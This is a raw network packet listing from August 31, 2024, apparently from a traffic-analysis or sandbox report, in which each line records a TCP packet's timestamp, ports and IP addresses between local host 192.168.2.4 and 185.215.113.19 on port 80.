Aug 31, 2024 22:41:57.723582029 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.723596096 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.723623037 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.723634005 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.723654032 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.723680019 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.723732948 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.723732948 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.723732948 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.723756075 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.723781109 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.723808050 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.723830938 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.723845005 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.723869085 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.723886013 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.723929882 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.723931074 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.723944902 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.723965883 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.723997116 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.724045038 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.724045038 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.724062920 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.724091053 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.724104881 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.724128008 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.724148989 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.724167109 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.724185944 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.724205017 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.724220037 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.724248886 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.724272013 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.724282026 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.724308968 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.724333048 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.724356890 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.724370003 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.724389076 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.724412918 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.724441051 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.724462032 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.724508047 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.724508047 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.724518061 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.724538088 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.724565029 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.724581003 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.724603891 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.724633932 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.724656105 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.724678040 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.724694967 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.724725008 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.724741936 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.724766016 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.724786997 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.724805117 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.724818945 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.724863052 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.724863052 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.724878073 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.724900961 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.724916935 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.724940062 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.724961042 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.724986076 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.725004911 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.725028038 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.725050926 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.725063086 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.725085020 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.725097895 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.725119114 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.725137949 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.725157976 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.725179911 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.725203991 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.725225925 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.725249052 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.725267887 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.725286007 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.725310087 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.725331068 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.725352049 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.725367069 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.725389957 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.725410938 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.725426912 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.725445986 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.725466013 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.725488901 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.725511074 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.725533962 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.725552082 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.725574017 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.725598097 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.725616932 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.725639105 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.725661993 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.725680113 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.725703001 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.725719929 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.725739956 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.725756884 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.725783110 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.725804090 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.725847006 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.725847006 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.725857973 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.725884914 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.725899935 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.725928068 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.725950956 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.725971937 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.725986958 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.726015091 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.726026058 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.726049900 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.726067066 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.726089001 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.726109982 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.726130009 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.726149082 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.726170063 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.726195097 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.726212025 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.726231098 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.726253986 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.726275921 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.726304054 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.726324081 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.726342916 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.726362944 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.726381063 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.726402998 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.726419926 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.726445913 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.726468086 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.726485014 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.726504087 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.726535082 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.726557970 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.726573944 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.726598024 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.726608992 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.726636887 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.726658106 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.726676941 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.726691961 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.726712942 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.726736069 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.726756096 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.726778030 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.726799965 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.726821899 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.726845980 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.726862907 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.726880074 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.726903915 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.726922035 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.726944923 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.726960897 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.726984978 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.727000952 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.727021933 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.727027893 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.727041960 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.727065086 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.727119923 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.727140903 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.727158070 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.727179050 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.727195024 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.727219105 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.727236986 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.727256060 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.727279902 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.727289915 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.727317095 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.727336884 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.727366924 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.727400064 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.727431059 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.727458954 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.727480888 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.727509022 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.727538109 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.727560997 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.727588892 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.727610111 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.727638960 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.727659941 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.727684021 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.727708101 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.727735043 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.727756977 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.727776051 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.727806091 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.727828979 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.727850914 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.727870941 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.727890015 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.727910042 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.727932930 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.727946043 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.727967978 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.727988005 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.728013992 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.728024960 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.728049040 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.728070974 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.728091002 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.728113890 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.728137970 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.728233099 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.728267908 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.728291988 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.728318930 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.728346109 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.728369951 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.728398085 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.728421926 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.728447914 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.728473902 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.728494883 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.728528976 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.728559971 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.728586912 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.728616953 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.728641033 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.728668928 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.728693962 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.728719950 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.728743076 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.728769064 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.728796005 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.728821039 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.728840113 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.728874922 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.728902102 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.728928089 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.728961945 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.728991032 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.729016066 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.729041100 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.729065895 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.729091883 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.729118109 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.729146004 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.729166985 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.729195118 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.729221106 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.729243994 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.729273081 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.729298115 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.729326010 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.729352951 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.729381084 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.729406118 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.729433060 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.729455948 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.729485035 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.729511023 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.729537010 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.729562044 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.729585886 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.729614019 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.729640007 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.729666948 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.729691029 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.729718924 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.729751110 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.729777098 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.729799986 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.729827881 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.729852915 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.729877949 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.729902029 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.729928970 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.729954958 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.729979038 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.730007887 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.730036974 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.730062008 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.730087996 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.730113029 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.730142117 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.730165005 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.730194092 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.730218887 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.730288029 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.730313063 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.730335951 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.730387926 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.730415106 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.730438948 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.730467081 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.730493069 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.730518103 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.730545998 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.730571985 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.730598927 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.730619907 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.730645895 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.730670929 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.730695963 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.730720997 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.730748892 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.730771065 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.730798006 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.730823994 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.730849028 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.730873108 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.730900049 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.730926037 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.730953932 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.730983019 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.731009007 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.731030941 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.731056929 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.731081963 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.731106043 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.731132030 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.731154919 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.731180906 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.731208086 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.731234074 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.731259108 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.731281042 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.731303930 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.731332064 CEST	49732	80	192.168.2.4	185.215.113.19
